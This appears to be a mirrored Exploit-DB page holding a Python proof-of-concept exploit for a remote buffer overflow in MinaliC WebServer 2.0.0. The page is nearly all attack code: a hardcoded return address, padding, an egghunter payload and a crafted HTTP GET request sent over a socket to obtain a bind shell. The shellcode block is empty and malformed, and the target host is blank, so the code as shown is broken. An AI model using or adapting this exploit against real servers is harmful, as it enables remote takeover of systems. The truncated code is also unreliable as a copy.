MinaliC WebServer 2.0.0 – Remote Buffer Overflow (Egghunter)

  • 作者: PuN1sh3r
    日期: 2013-08-13
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/27554/
  • #!/usr/bin/env python
    # Exploit Title: MinaliC Webserver buffer overflow (egghunter)
    # Date: August 13 2013
    # Exploit Author: PuN1sh3r 
    # Email: luiguibiker@gmail.com
    # Vendor Homepage: http://minalic.sourceforge.net/
    # Version: MinaliC Webserver 2.0.0
    # Tested on: Windows XP Pro SP3, English
    # Description:
    # Remote command execution by triggering a buffer overflow in the GET 
    # request along with some buffer gymnastics using egghunters in order to attain a shell .
    # gr33zt to superkojiman for the initial exploit
    import socket
    # windows/shell_bind_tcphttp://www.metasploit.com
    # * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process,InitialAutoRunScript=, AutoRunScript=
    shellcode = (
    # Return addres Note:
    # 77C11F13JMP EBX on msvcrt.dll Windows XP SP3 English
    ret = "\x13\x1F\xC1\x77" 
    junk = "\x41" *245 + ret
    host = "\x90" * 30 + "A" * 40+ "\x90" * 31
    egg ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 
    buf = "GET /" + junk + " HTTP/1.1\r\n" + "Host: " + "\x90" * (100 - len(egg)) + egg + "\r\n"
    buf += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    buf += "User-Agent: " + "T00W" + "T00W" +"\x90" * (900 - len(shellcode)) + shellcode+ "\r\n\r\n" 
    print buf
    print "[+] sending buffer size", len(buf)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("", 8080))